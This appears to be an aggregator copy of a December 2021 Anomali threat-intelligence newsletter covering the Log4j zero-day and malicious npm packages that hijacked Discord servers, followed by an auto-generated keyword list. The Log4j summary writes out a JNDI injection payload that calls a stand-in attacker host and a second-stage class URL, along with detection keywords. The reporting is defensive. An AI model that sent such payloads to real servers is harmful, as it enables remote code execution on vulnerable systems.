One Article Review
| Source |  Anomali |
|---|---|
| Identifiant | 3800465 |
| Date de publication | 2021-12-15 16:00:00 (vue: 2021-12-15 16:05:55) |
| Titre | Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More |
| Texte | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache, Botnets, China, Espionage, Java, Russia, USB, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit
(published: December 10, 2021)
A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.
Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498
Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file
Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers
(published: December 8, 2021)
Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1 |
| Envoyé | Oui |
| Condensat | “and ‘oom 1000 2008 2019 2021 376 42681 42682 42683 42685 42686 42687 42688 42972 42973 42976 42977 42979 42980 42983 42986 42987 42988 42990 42993 42994 42996 43000 43002 43003 43006 43637 43638 44228 609 836 987 9998 about abused access accomplished accops according account accounts across actions active activity actor actor’s actors actually additional address addresses advisory affecting affects after again all allow allows alternative always amazon america american among amounts amzetta analyst anomali any apache appeared appliances application april apt15 apt29 arbitrary archive are are: arise around artifacts asf assist att&ck att&ck: attached attacker attackers attacks attributed autostart avoid aware aws back backdoor backdoors backup based basis beacon bear because been before begin beginning binary bind bitcoin blockchain boot both botnet botnets breach breaches broader broker business but bypassable caas called campaigns can capable capture caught ceeloader center certain chain change changed changes channel channels charts check china chosen cisco class client cloud cobalt code collected com com/a com/exploit command commands comment: committee common communication company compromising concept conducted conducting configuration configurations connections contain contained containing contains continue continued continuing continuity continuously control controlled controls could countless countries cozy cpu cracked credential credentials critical crucial cryptominer cryptomining customers cve cvss cyber cyberespionage cybersecurity data day december dedicated default delivered democratic denial deobfuscate/decode deployed deploying designed detected detection developed development device devices devops dictionary different diplomatic directory disable discord discordsystem discovery discuss discussed disguise disrupt disrupting distribution documentation documented done dormant download downloaded downloader downloading downloads dozen dump dumped dumping easily educate educated eltima employ employees enable encrypted energy ensure entities environments error escalate escalation espionage ethernet europe european evasion even execute execution exfiltration exists expand explaining explains exploit exploitation exploits external facing fail fallback false families field fighting figure file files filtering find firm five fix focus following form formatmsgnolookups found foundation frameworks frequently from functionality gather gathered geolocation gets glimpse globe glupteba google government governmental governments great group group’s groups guidelines had hardcoded has have here hide higher hijacking host how however http://second https identified image implants implementing improving incident include: including: indicate indicator individuals information infostealing infrastructure ingress initial injected injection input install instance; instrumentation intelligence interface internal interpreter ioc iocs issued iteration its itself java javascript jfrog jndi jndi:ldap://attacker ke3chang kernel keys keywords large lastly lateral latin layer ldap least leeson legitimate lengths library lightbox likely limits list located lofy log4j log4j2 log4shell logging logon logs long longevity lunasec machines made magazine maintain maintenance major makes malicious malware management mandiant manipulation masquerading may means measures mechanism mechdyne mega message method methods microsoft millions mimic mimikatz mine miner mitre modify more motivated mrg multiple must names naming nas national nature need neoichor network networks new news next nickel nist nobelium nomachine non notable note npm nullitch numbldea numerous obfuscated objective observed octavius often only open operation organizations originated other others over owner/user package packages panda paramount password patch patches path pay payload payload: per permission persistent perspective phishing pid pivot place plans policies pool port pose potential powershell prerequests primary private privilege privilege |
| Tags | Malware Tool Vulnerability Threat Cloud |
| Stories | APT 37 APT 29 APT 15 APT 15 APT 25 |
| Notes | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.